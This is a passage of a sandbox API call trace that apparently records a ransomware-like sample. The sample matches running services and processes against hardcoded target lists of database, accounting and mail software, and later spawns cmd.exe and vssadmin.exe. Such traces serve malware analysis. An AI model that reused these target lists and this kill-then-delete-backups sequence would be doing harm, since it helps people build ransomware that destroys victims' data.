	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0053.259] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0053.259] lstrlenW (lpString="swprv") returned 5
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0053.260] lstrlenW (lpString="SysMain") returned 7
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0053.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0053.260] lstrlenW (lpString="Themes") returned 6
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0053.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0053.260] lstrlenW (lpString="TrkWks") returned 6
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0053.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0053.260] lstrlenW (lpString="UxSms") returned 5
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0053.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0053.260] lstrlenW (lpString="VSS") returned 3
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0053.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0053.260] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0053.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0053.260] lstrlenW (lpString="WdiServiceHost") returned 14
	[0053.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0053.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0053.261] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0053.261] lstrlenW (lpString="WdiSystemHost") returned 13
	[0053.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0053.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0053.261] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0053.261] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0053.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0053.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0053.261] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0053.261] lstrlenW (lpString="Winmgmt") returned 7
	[0053.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0053.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0053.261] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0053.261] lstrlenW (lpString="WPDBusEnum") returned 10
	[0053.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0053.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0053.261] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0053.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0053.261] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0053.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x178
	[0053.264] Process32FirstW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0053.264] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0053.265] lstrlenW (lpString="System") returned 6
	[0053.265] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0053.265] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0053.265] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0053.266] lstrlenW (lpString="smss.exe") returned 8
	[0053.266] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0053.266] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0053.266] lstrlenW (lpString="csrss.exe") returned 9
	[0053.266] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0053.266] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0053.266] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0053.266] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0053.266] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0053.266] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0053.266] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0053.267] lstrlenW (lpString="wininit.exe") returned 11
	[0053.267] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0053.267] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0053.267] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0053.267] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0053.268] lstrlenW (lpString="csrss.exe") returned 9
	[0053.268] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0053.268] lstrlenW (lpString="winlogon.exe") returned 12
	[0053.268] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0053.268] lstrlenW (lpString="services.exe") returned 12
	[0053.269] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0053.269] lstrlenW (lpString="lsass.exe") returned 9
	[0053.269] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0053.269] lstrlenW (lpString="lsm.exe") returned 7
	[0053.269] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.270] lstrlenW (lpString="svchost.exe") returned 11
	[0053.270] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.270] lstrlenW (lpString="svchost.exe") returned 11
	[0053.270] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.271] lstrlenW (lpString="svchost.exe") returned 11
	[0053.271] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.271] lstrlenW (lpString="svchost.exe") returned 11
	[0053.271] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.272] lstrlenW (lpString="svchost.exe") returned 11
	[0053.272] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0053.272] lstrlenW (lpString="audiodg.exe") returned 11
	[0053.272] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.273] lstrlenW (lpString="svchost.exe") returned 11
	[0053.273] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.273] lstrlenW (lpString="svchost.exe") returned 11
	[0053.273] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0053.274] lstrlenW (lpString="dwm.exe") returned 7
	[0053.274] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0053.274] lstrlenW (lpString="explorer.exe") returned 12
	[0053.274] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0053.275] lstrlenW (lpString="spoolsv.exe") returned 11
	[0053.275] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0053.275] lstrlenW (lpString="taskhost.exe") returned 12
	[0053.275] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.275] lstrlenW (lpString="svchost.exe") returned 11
	[0053.275] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0053.276] lstrlenW (lpString="taskeng.exe") returned 11
	[0053.276] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0053.276] lstrlenW (lpString="taskhost.exe") returned 12
	[0053.276] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0053.277] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0053.277] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0053.277] lstrlenW (lpString="python tragedy.exe") returned 18
	[0053.277] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0053.278] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0053.278] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0053.278] lstrlenW (lpString="computers.exe") returned 13
	[0053.278] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0053.279] lstrlenW (lpString="separated.exe") returned 13
	[0053.279] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0053.279] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0053.279] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0053.280] lstrlenW (lpString="darkness.exe") returned 12
	[0053.280] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0053.280] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0053.280] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0053.281] lstrlenW (lpString="sophisticated.exe") returned 17
	[0053.281] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0053.281] lstrlenW (lpString="wishlist.exe") returned 12
	[0053.281] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0053.282] lstrlenW (lpString="top.exe") returned 7
	[0053.282] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0053.282] lstrlenW (lpString="implemented.exe") returned 15
	[0053.282] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0053.283] lstrlenW (lpString="comp.exe") returned 8
	[0053.283] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0053.283] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0053.283] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0053.283] lstrlenW (lpString="solved.exe") returned 10
	[0053.284] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0053.284] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0053.284] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0053.284] lstrlenW (lpString="trips.exe") returned 9
	[0053.284] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0053.285] lstrlenW (lpString="tumormanual.exe") returned 15
	[0053.285] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0053.285] lstrlenW (lpString="telecom.exe") returned 11
	[0053.285] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0053.286] lstrlenW (lpString="realistic.exe") returned 13
	[0053.286] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0053.286] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0053.286] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0053.287] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0053.287] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0053.287] lstrlenW (lpString="cmd.exe") returned 7
	[0053.287] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0053.288] lstrlenW (lpString="conhost.exe") returned 11
	[0053.288] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0053.288] lstrlenW (lpString="vssadmin.exe") returned 12
